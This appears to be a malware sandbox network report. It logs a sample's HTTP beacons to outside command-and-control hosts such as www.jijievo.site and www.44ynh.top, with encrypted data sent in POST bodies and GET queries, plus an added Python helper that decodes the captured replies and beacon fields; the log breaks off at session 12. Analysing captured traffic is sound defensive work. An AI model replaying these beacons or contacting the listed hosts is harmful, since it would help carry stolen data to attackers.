                                                              Data Ascii: X25tIdT0=TowXiW7yiZaI/a8bShqKOQsaztTKAFyWH734ZKxcH0m9JkqPPBJSoPWejzRhK3I7pqvIrhflDofLOp2alccvxk/5tj/ItvSqycBkplAwsUhY8iK6k9wzOvnCm422cO5BvGvN0yzY1TH7cPV9A4MBMBOG9ibt4lSRzCzRNf6++TdNbfkL6srvAqKXlw+PPXttJtZPFpXW0fNGB02IgG2HZ1Qa5KsDbyaF5aST/t/vmUnze9D8S/ax5u3/vhRcxBO4JSlzZHmY4ExLJKoFLohQgruILM/5sI2gJhExj+2n/M0zzKfuhvvHZsNmLybb3RtxoAWSHS+mxGt4EgngWEVwIjwKXdgvaeZaSU9J/KUGqwokiZmGJlJ4eDRQ8rSd94L0O86tUpiNiw2bomLWD6Xg33XdMNSawJcFQLp4vwyXfXej9mU88oJ/CNb7k1G8/CjH7GOW0nvWiAOB4h6dYAbvu9TPbchNDbZb0P2AtfFWWNbfeq002lr0GFu7o9NrgeJuDd8m+moseykbAv9EMdu/ovCVd9ocnlFetidSH1TsDLbW34QoJM5ql8hovVThW/p0z93cw3f+/vENxxfQ3WMtHRXknAMNyKAXxHa1jxpLwfgXv5/nAMNEno27WsjqjiIeVz1oJDUOJjcY/PzTZdWfcgz+aiJlqX6eWuMfVD9gTLuvnTGHJB3CEmYXm6sOkneUEA2S7gAqN6+64wrPeewJGOK2cU4EIa9Y40E54NjNZNzo9QEP2YbrpXhxz0BGwnJr4lZq3DIeJyKl44iS0Osi9Lts7FXspLQCfMX6voZDUkczprT9X3cGG0DDG7MqOcV7c89gc2JNhFqZJNXeahJpYfXFdOy1I/gyoDmguFfFZhRRb8FQqaj5goKlcHmJ73+rdaXmJUdTAtkU503M1pEY57pl2NMgrL3FNCLKC4Os6YqJ2aHetBHlnwkU9m8kofs5PWa+M6oZdmVZ1p2x+mfJLJGmhnF/aok0zy2MMdtAGKi [TRUNCATED]
                                                              Dec 9, 2024 09:11:08.903601885 CET | 780 | IN | HTTP/1.1 404 Not Found
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Date: Mon, 09 Dec 2024 08:11:08 GMT
                                                              Server: Apache
                                                              X-Frame-Options: deny
                                                              Content-Encoding: gzip


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              4 | 192.168.2.4 | 49818 | 217.160.0.113 | 80 | 5592 | C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 9, 2024 09:11:10.285001040 CET | 480 | OUT | GET /m5si/?X25tIdT0=eqY3hh7t27bJ5LQfUACiIBop+4++C12UJ8jqVv8fYDW4JFKoOjNM9tGFtSdYH3IXt9v4kCCdG8KeR7OcjMcnk3D3+1Po89+p2utRtVEn8mZesTWlz/QNOcc=&_PMl3=z6VH1Hp8JH HTTP/1.1
                                                              Host: www.prestigerugz.info
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Dec 9, 2024 09:11:11.632448912 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Content-Type: text/html
                                                              Content-Length: 1271
                                                              Connection: close
                                                              Date: Mon, 09 Dec 2024 08:11:11 GMT
                                                              Server: Apache
                                                              X-Frame-Options: deny
                                                              Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                                              Dec 9, 2024 09:11:11.632467985 CET | 203 | IN | Data Ascii: + window.location.host + '/' + 'IONOSParkingUK' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              5 | 192.168.2.4 | 49858 | 154.90.58.209 | 80 | 5592 | C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 9, 2024 09:11:27.138220072 CET | 738 | OUT | POST /521z/ HTTP/1.1
                                                              Host: www.jijievo.site
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 205
                                                              Origin: http://www.jijievo.site
                                                              Referer: http://www.jijievo.site/521z/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 56 7a 66 67 30 4d 64 49 55 66 70 62 37 48 2b 41 67 72 57 45 6d 38 79 2b 69 68 56 6f 35 51 61 2f 2b 65 63 36 73 51 6a 46 51 39 4e 6b 46 32 34 74 67 78 50 75 6f 79 50 78 46 74 34 4b 33 6c 42 73 32 6d 68 68 49 45 54 51 37 65 62 72 76 4a 48 34 42 59 73 55 4e 48 51 6f 48 59 2b 35 33 51 51 47 6c 51 7a 46 4b 74 61 7a 42 69 5a 4e 76 76 78 52 6f 34 78 77 4b 79 74 4a 63 43 74 35 36 7a 33 6f 6f 68 52 7a 46 5a 35 2f 2b 43 2b 45 35 56 6a 38 2b 66 58 52 41 54 4b 39 53 4c 39 45 7a 61 45 58 33 75 38 65 65 69 70 64 74 43 53 34 35 71 59 6b 36 35 6f 47 52 72 74 69 4f 38 4c 6a 48 32 74 6c 63 67 3d 3d
                                                              Data Ascii: X25tIdT0=Vzfg0MdIUfpb7H+AgrWEm8y+ihVo5Qa/+ec6sQjFQ9NkF24tgxPuoyPxFt4K3lBs2mhhIETQ7ebrvJH4BYsUNHQoHY+53QQGlQzFKtazBiZNvvxRo4xwKytJcCt56z3oohRzFZ5/+C+E5Vj8+fXRATK9SL9EzaEX3u8eeipdtCS45qYk65oGRrtiO8LjH2tlcg==
                                                              Dec 9, 2024 09:11:28.708869934 CET  241                IN         HTTP/1.1 200 OK
                                                              Content-Encoding: gzip
                                                              Content-Type: text/html; charset=UTF-8
                                                              Date: Mon, 09 Dec 2024 08:11:28 GMT
                                                              Server: nginx
                                                              Vary: Accept-Encoding
                                                              Content-Length: 44
                                                              Connection: close
                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
                                                              Data Ascii: KLIU(WHO-QHKM.g   (the report prints only the printable bytes of the body; the body itself is the gzip stream above, see Content-Encoding)


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              6           192.168.2.4  49864        154.90.58.209   80                5592  C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp                           Bytes transferred  Direction  Data
                                                              Dec 9, 2024 09:11:29.806229115 CET  758                OUT        POST /521z/ HTTP/1.1
                                                              Host: www.jijievo.site
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 225
                                                              Origin: http://www.jijievo.site
                                                              Referer: http://www.jijievo.site/521z/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 56 7a 66 67 30 4d 64 49 55 66 70 62 36 6b 32 41 74 73 71 45 75 38 79 39 75 42 56 6f 77 77 61 37 2b 65 41 36 73 55 36 61 52 49 6c 6b 46 57 49 74 78 46 62 75 6c 53 50 78 4e 4e 34 50 7a 6c 42 6c 32 6d 74 44 49 41 50 51 37 65 50 72 76 4c 66 34 42 75 6b 56 4d 58 51 71 50 34 2b 37 36 77 51 47 6c 51 7a 46 4b 72 33 63 42 69 68 4e 75 66 42 52 70 61 5a 7a 57 43 74 49 55 69 74 35 73 7a 33 73 6f 68 51 6d 46 64 67 61 2b 41 57 45 35 58 72 38 2f 4f 58 53 4f 54 4b 37 64 72 38 4b 33 66 35 73 37 39 59 53 41 54 42 67 6c 6d 6d 44 78 4d 56 2b 72 49 4a 52 44 72 4a 52 54 37 43 58 4b 31 51 73 48 68 39 70 55 65 45 79 59 37 61 46 4e 77 65 58 53 6f 4c 76 55 5a 6f 3d
                                                              Data Ascii: X25tIdT0=Vzfg0MdIUfpb6k2AtsqEu8y9uBVowwa7+eA6sU6aRIlkFWItxFbulSPxNN4PzlBl2mtDIAPQ7ePrvLf4BukVMXQqP4+76wQGlQzFKr3cBihNufBRpaZzWCtIUit5sz3sohQmFdga+AWE5Xr8/OXSOTK7dr8K3f5s79YSATBglmmDxMV+rIJRDrJRT7CXK1QsHh9pUeEyY7aFNweXSoLvUZo=
                                                              Dec 9, 2024 09:11:31.386343956 CET  241                IN         HTTP/1.1 200 OK
                                                              Content-Encoding: gzip
                                                              Content-Type: text/html; charset=UTF-8
                                                              Date: Mon, 09 Dec 2024 08:11:31 GMT
                                                              Server: nginx
                                                              Vary: Accept-Encoding
                                                              Content-Length: 44
                                                              Connection: close
                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
                                                              Data Ascii: KLIU(WHO-QHKM.g   (printable bytes of the gzip-compressed body only; identical to the session 5 response)


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              7           192.168.2.4  49871        154.90.58.209   80                5592  C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp                           Bytes transferred  Direction  Data
                                                              Dec 9, 2024 09:11:32.464766026 CET  10840              OUT        POST /521z/ HTTP/1.1
                                                              Host: www.jijievo.site
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 10305
                                                              Origin: http://www.jijievo.site
                                                              Referer: http://www.jijievo.site/521z/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 56 7a 66 67 30 4d 64 49 55 66 70 62 36 6b 32 41 74 73 71 45 75 38 79 39 75 42 56 6f 77 77 61 37 2b 65 41 36 73 55 36 61 52 49 39 6b 45 6e 6f 74 6a 58 7a 75 6b 53 50 78 48 74 34 4f 7a 6c 41 33 32 6d 31 48 49 48 48 71 37 64 33 72 39 61 2f 34 48 63 4d 56 47 58 51 71 4e 34 2b 34 33 51 52 63 6c 51 6a 42 4b 74 58 63 42 69 68 4e 75 63 5a 52 74 49 78 7a 46 53 74 4a 63 43 74 31 36 7a 33 55 6f 68 59 32 46 64 74 76 2b 77 32 45 35 33 37 38 39 38 2f 53 43 54 4b 35 65 72 39 58 33 66 39 7a 37 39 46 68 41 54 46 4f 6c 68 4f 44 7a 64 6b 30 70 35 74 39 53 62 74 4f 49 34 36 71 4f 46 45 50 4a 77 6b 4a 61 4f 64 72 61 4b 79 38 4b 33 6e 4d 4b 59 2f 70 44 74 61 45 58 41 6a 37 46 35 42 2f 37 66 63 33 4f 32 62 43 31 78 77 73 2b 2f 39 45 70 33 36 47 4b 56 39 34 53 5a 68 4d 62 62 2b 48 77 66 58 4b 34 4b 57 6c 75 57 71 32 67 53 56 6a 48 30 36 2b 32 49 6a 51 66 6a 63 55 76 4a 2b 4a 73 30 52 56 69 51 66 79 62 52 2b 78 39 4e 49 4a 45 35 55 62 53 48 69 2b 54 57 67 37 35 68 4a 42 68 46 4d 7a 57 58 63 55 55 [TRUNCATED]
                                                              Data Ascii: X25tIdT0= [TRUNCATED]


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              8           192.168.2.4  49879        154.90.58.209   80                5592  C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp                           Bytes transferred  Direction  Data
                                                              Dec 9, 2024 09:11:35.131052971 CET  475                OUT        GET /521z/?X25tIdT0=Yx3A360WU89Z0GGJ4sj1ssKBmwUq+j2s/KQE4E7BbN1HAmIot3HipiLJPY42zmsSwDZ5HnrJyLyqyKfyPPN/Ul94K97G9BNerQ7FJbOxJndggPtqh59eHiM=&_PMl3=z6VH1Hp8JH HTTP/1.1
                                                              Host: www.jijievo.site
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Dec 9, 2024 09:11:36.716455936 CET  197                IN         HTTP/1.1 200 OK
                                                              Content-Type: text/html; charset=UTF-8
                                                              Date: Mon, 09 Dec 2024 08:11:36 GMT
                                                              Server: nginx
                                                              Vary: Accept-Encoding
                                                              Content-Length: 24
                                                              Connection: close
                                                              Data Raw: 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                              Data Ascii: Unable to get connection
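Sessions 5, 6 and 8 above contain enough to check the report's rendering offline. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it turns the "Data Raw" hex of the gzip response in sessions 5 and 6 back into text, and splits the POST body and the GET query of the beacon without URL-decoding them. The 44-byte gzip body decompresses to the same 24-byte "Unable to get connection" string that session 8 received uncompressed; the "Data Ascii" the report prints for it ("KLIU(WHO-QHKM.g") is merely the printable bytes of the compressed stream. The sample sends its base64 value with literal "+" and "/" (raw bytes 0x2b and 0x2f, not %2B and %2F), so urllib.parse.parse_qs, which would turn "+" into a space, is deliberately avoided. The function names and the convention that the first form field carries the encrypted beacon are this example's own assumptions; the report gives no key for that value, so the example stops at the decoded ciphertext.

```python
import base64
import gzip

# Copied from the "Data Raw" line of the session 5 response in this report
# (Content-Encoding: gzip, Content-Length: 44). Session 6 carries the same bytes.
RESPONSE_DATA_RAW = (
    "1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 "
    "ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00"
)

# The 205-byte POST body of session 5, copied from the report's "Data Ascii" line.
POST_BODY = (
    "X25tIdT0=Vzfg0MdIUfpb7H+AgrWEm8y+ihVo5Qa/+ec6sQjFQ9NkF24tgxPuoyPxFt4K3lBs2mhh"
    "IETQ7ebrvJH4BYsUNHQoHY+53QQGlQzFKtazBiZNvvxRo4xwKytJcCt56z3oohRzFZ5/+C+E5Vj8+"
    "fXRATK9SL9EzaEX3u8eeipdtCS45qYk65oGRrtiO8LjH2tlcg=="
)

# The request line of the session 8 GET, copied from the report.
GET_REQUEST_LINE = (
    "GET /521z/?X25tIdT0=Yx3A360WU89Z0GGJ4sj1ssKBmwUq+j2s/KQE4E7BbN1HAmIot3HipiLJPY4"
    "2zmsSwDZ5HnrJyLyqyKfyPPN/Ul94K97G9BNerQ7FJbOxJndggPtqh59eHiM=&_PMl3=z6VH1Hp8JH"
    " HTTP/1.1"
)


def hexdump_to_bytes(data_raw: str) -> bytes:
    """Convert the space-separated hex of a 'Data Raw' line into bytes."""
    return bytes.fromhex(data_raw.replace(" ", ""))


def decode_response(data_raw: str) -> str:
    """Gunzip a captured response body; gzip.decompress also verifies the CRC32 trailer."""
    return gzip.decompress(hexdump_to_bytes(data_raw)).decode("utf-8")


def split_form(form_data: str) -> dict:
    """Split 'k=v&k2=v2' on '&' and on the first '=' only, with no URL decoding.

    urllib.parse.parse_qs would turn the literal '+' inside the base64 value
    into spaces; the raw hex shows the sample sends 0x2b and 0x2f unencoded.
    """
    fields = {}
    for field in form_data.split("&"):
        key, _, value = field.partition("=")
        fields[key] = value
    return fields


def query_of(request_line: str) -> str:
    """'GET /path/?a=b HTTP/1.1' -> 'a=b'."""
    target = request_line.split(" ")[1]
    return target.partition("?")[2]


def beacon_ciphertext(form_data: str) -> bytes:
    """Base64-decode the first field of a beacon body or query string.

    Assumption made by this example: the first field carries the encrypted
    beacon. The short trailing '_PMl3' field of the GET is left as an opaque token.
    """
    key, value = next(iter(split_form(form_data).items()))
    return base64.b64decode(value, validate=True)


if __name__ == "__main__":
    print(repr(decode_response(RESPONSE_DATA_RAW)))
    print(len(POST_BODY), "body bytes ->", len(beacon_ciphertext(POST_BODY)), "ciphertext bytes")
    print(list(split_form(query_of(GET_REQUEST_LINE))))
```

Running it prints the decompressed server reply, the 145 ciphertext bytes hidden in the 205-byte POST, and the two query keys of the GET. The same two helpers apply unchanged to the sessions against www.44ynh.top and www.75178.club further down, which reuse the X25tIdT0 key.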


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              9           192.168.2.4  49897        38.181.21.178   80                5592  C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp                           Bytes transferred  Direction  Data
                                                              Dec 9, 2024 09:11:42.512797117 CET  729                OUT        POST /l9wb/ HTTP/1.1
                                                              Host: www.44ynh.top
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 205
                                                              Origin: http://www.44ynh.top
                                                              Referer: http://www.44ynh.top/l9wb/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 51 49 41 31 41 74 57 46 51 33 42 67 37 66 76 69 61 61 53 56 4e 54 56 6a 55 59 35 48 55 4a 5a 31 6b 75 31 31 55 6e 57 4d 47 68 59 78 43 78 2b 63 54 49 46 31 37 78 77 59 43 5a 6a 71 72 4a 61 67 4a 4d 70 52 63 76 39 66 64 62 59 71 45 4c 42 54 79 4d 4d 44 31 4c 32 35 78 39 70 33 6d 34 2b 48 36 4a 4e 61 34 77 69 51 57 64 47 73 62 78 4a 51 4b 62 4d 32 52 30 71 75 61 70 56 58 37 74 4c 4e 72 53 48 72 59 51 63 69 30 36 74 31 4e 74 4c 6b 63 32 52 4b 39 47 76 39 53 4d 33 44 56 62 6f 62 70 4c 4e 58 63 44 59 73 4a 47 39 65 73 73 6d 2f 65 34 43 48 6e 47 72 7a 4b 37 34 4a 31 6b 6a 70 74 41 3d 3d
                                                              Data Ascii: X25tIdT0=QIA1AtWFQ3Bg7fviaaSVNTVjUY5HUJZ1ku11UnWMGhYxCx+cTIF17xwYCZjqrJagJMpRcv9fdbYqELBTyMMD1L25x9p3m4+H6JNa4wiQWdGsbxJQKbM2R0quapVX7tLNrSHrYQci06t1NtLkc2RK9Gv9SM3DVbobpLNXcDYsJG9essm/e4CHnGrzK74J1kjptA==
                                                              Dec 9, 2024 09:11:44.001899004 CET  302                IN         HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 09 Dec 2024 08:11:43 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 138
                                                              Connection: close
                                                              ETag: "66df0ead-8a"
                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              10          192.168.2.4  49904        38.181.21.178   80                5592  C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp                           Bytes transferred  Direction  Data
                                                              Dec 9, 2024 09:11:45.280826092 CET  749                OUT        POST /l9wb/ HTTP/1.1
                                                              Host: www.44ynh.top
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 225
                                                              Origin: http://www.44ynh.top
                                                              Referer: http://www.44ynh.top/l9wb/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 51 49 41 31 41 74 57 46 51 33 42 67 34 2f 2f 69 57 5a 71 56 4c 7a 56 6b 52 59 35 48 64 70 5a 78 6b 75 35 31 55 6d 53 69 46 55 77 78 46 54 32 63 51 4e 70 31 33 52 77 59 62 70 6a 76 6c 70 61 64 4a 4d 6b 69 63 75 78 66 64 66 77 71 45 4b 78 54 79 36 45 43 31 62 32 2f 6b 74 70 35 72 59 2b 48 36 4a 4e 61 34 77 6e 39 57 5a 53 73 62 46 31 51 4a 2b 73 33 59 55 71 70 4d 35 56 58 2f 74 4c 4a 72 53 48 56 59 56 31 2f 30 38 70 31 4e 6f 76 6b 64 6b 35 56 30 47 76 37 66 73 32 42 55 4f 46 54 73 6f 34 71 58 6a 45 71 4d 43 6c 2f 74 71 72 6c 50 4a 6a 51 31 47 50 41 58 38 78 39 34 6e 65 67 32 4e 35 34 6d 66 36 76 7a 69 51 63 6d 55 52 4c 68 73 31 71 62 7a 6f 3d
                                                              Data Ascii: X25tIdT0=QIA1AtWFQ3Bg4//iWZqVLzVkRY5HdpZxku51UmSiFUwxFT2cQNp13RwYbpjvlpadJMkicuxfdfwqEKxTy6EC1b2/ktp5rY+H6JNa4wn9WZSsbF1QJ+s3YUqpM5VX/tLJrSHVYV1/08p1Novkdk5V0Gv7fs2BUOFTso4qXjEqMCl/tqrlPJjQ1GPAX8x94neg2N54mf6vziQcmURLhs1qbzo=
                                                              Dec 9, 2024 09:11:46.696757078 CET  302                IN         HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 09 Dec 2024 08:11:46 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 138
                                                              Connection: close
                                                              ETag: "66df0ead-8a"
                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              11          192.168.2.4  49912        38.181.21.178   80                5592  C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp                           Bytes transferred  Direction  Data
                                                              Dec 9, 2024 09:11:47.983464956 CET  10831              OUT        POST /l9wb/ HTTP/1.1
                                                              Host: www.44ynh.top
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 10305
                                                              Origin: http://www.44ynh.top
                                                              Referer: http://www.44ynh.top/l9wb/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 51 49 41 31 41 74 57 46 51 33 42 67 34 2f 2f 69 57 5a 71 56 4c 7a 56 6b 52 59 35 48 64 70 5a 78 6b 75 35 31 55 6d 53 69 46 55 6f 78 46 68 4f 63 53 75 78 31 32 52 77 59 54 4a 6a 75 6c 70 61 4d 4a 4d 4d 75 63 75 74 50 64 64 49 71 57 5a 35 54 30 49 73 43 2b 62 32 2f 6d 74 70 30 6d 34 2b 57 36 4a 64 57 34 77 33 39 57 5a 53 73 62 45 6c 51 64 62 4d 33 65 55 71 75 61 70 56 54 37 74 4b 75 72 54 76 6a 59 56 78 76 30 73 4a 31 4f 49 2f 6b 52 33 52 56 37 47 76 35 4d 63 32 6a 55 4f 42 63 73 6f 6b 78 58 67 59 4d 4d 46 46 2f 76 66 32 75 64 59 44 4c 6f 6e 33 4d 45 65 45 66 35 48 4f 6b 32 61 4a 55 6d 4e 57 6c 73 6a 67 72 75 57 77 44 37 2f 38 72 4d 55 72 55 2b 4f 71 59 79 41 76 2f 61 74 44 58 48 6e 43 79 4b 43 36 57 2b 4f 54 75 37 59 6b 6c 49 78 6e 6f 2f 6f 71 4f 6f 75 41 50 2b 59 47 6e 55 57 75 47 7a 4f 46 67 4c 71 38 32 77 6e 43 4a 73 63 44 63 75 42 48 31 76 4e 4f 74 63 6f 2f 6d 2b 68 63 45 58 33 6d 66 33 33 69 56 46 32 44 5a 31 65 4b 54 67 46 67 2b 6d 30 4e 72 34 66 79 63 70 54 37 43 6b [TRUNCATED]
                                                              Data Ascii: X25tIdT0= [TRUNCATED]
                                                              Dec 9, 2024 09:11:49.471088886 CET  302                IN         HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 09 Dec 2024 08:11:49 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 138
                                                              Connection: close
                                                              ETag: "66df0ead-8a"
                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              12          192.168.2.4  49920        38.181.21.178   80                5592  C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp                           Bytes transferred  Direction  Data
